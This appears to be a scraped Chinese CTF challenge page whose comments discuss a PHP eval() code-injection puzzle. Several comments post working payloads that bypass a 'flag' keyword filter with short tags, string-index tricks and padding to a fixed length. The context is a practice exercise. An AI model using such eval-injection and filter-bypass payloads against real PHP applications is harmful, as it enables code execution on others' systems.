评分(6)
解题动态
20230302241 攻破了该题 2小时前
typ11 攻破了该题 5小时前
潘福演 攻破了该题 5小时前
kklff4399 攻破了该题 6小时前
黎悦依 攻破了该题 6小时前
凌晨两点半 攻破了该题 7小时前
陆鑫 攻破了该题 7小时前
覃允哥哥 攻破了该题 7小时前
莫泽明 攻破了该题 7小时前
刘德龙 攻破了该题 7小时前
蒙亮江 攻破了该题 8小时前
834bug 攻破了该题 19小时前
木秀于林 攻破了该题 20小时前
农群丹 攻破了该题 1天前
YTT 攻破了该题 1天前
何林凤 攻破了该题 1天前
韦东妙 攻破了该题 1天前
党玉新 攻破了该题 1天前
HHHHYY 攻破了该题 1天前
评论
harry2025 4天前
举报
eval()内出现孤立<,必报unexpected '<'错误,无例外。
罗满佳 8天前
举报
flag{**********}
网恋秀牛子被录屏导致自卑 13天前
举报
考察了闭合,还有短标签
南交混的入朱靖宇 1月前
举报
flag被过滤,构建$a='fla1';$a{*********}='g'; // 把字符串的第 4 个字符改成 g题里要求:strlen($_GET['flag']) == strlen($exam),而 $exam 的长度是 49。
Alune 1月前
举报
个人理解eval构造中存在<? ?> payload 第一个?>中与前一个闭合 而让后面的当作代码执行,不闭合的话后面就是<? <? ?> ?>代码嵌套代码了,会报错
孙谦的鸟岛 3月前
举报
孙千的**来咯
派大星CTF 1年前
举报
eavl()会开启新的php标签,而不是闭合第一行代码的标签所以需要结束eval里开启的标签,在开启一个php代码来执行输出$flag
YUMEKO 1年前
举报
http://xxxxxxxxxx/?flag=$a='fla9';$a{3}='g';?><?=$$a;?>111111111111111333
Daniel2023 1年前
举报
payload: /?flag=$a='fla9';$a{3}='g';?><?=$$a;?>111111111111111111
coo1an 2年前
举报
1、长度是年9, 2、利用短标签和替代,<?php echo $flag;?>使用短标签(<? echo $flag;?>,,再继续使用短标签替代echo ,<?= $flag;?> flag=$f=%274lag%27;$f{0}=%27f%27;?%3E%3C?=$$f;?%3E111111111111111111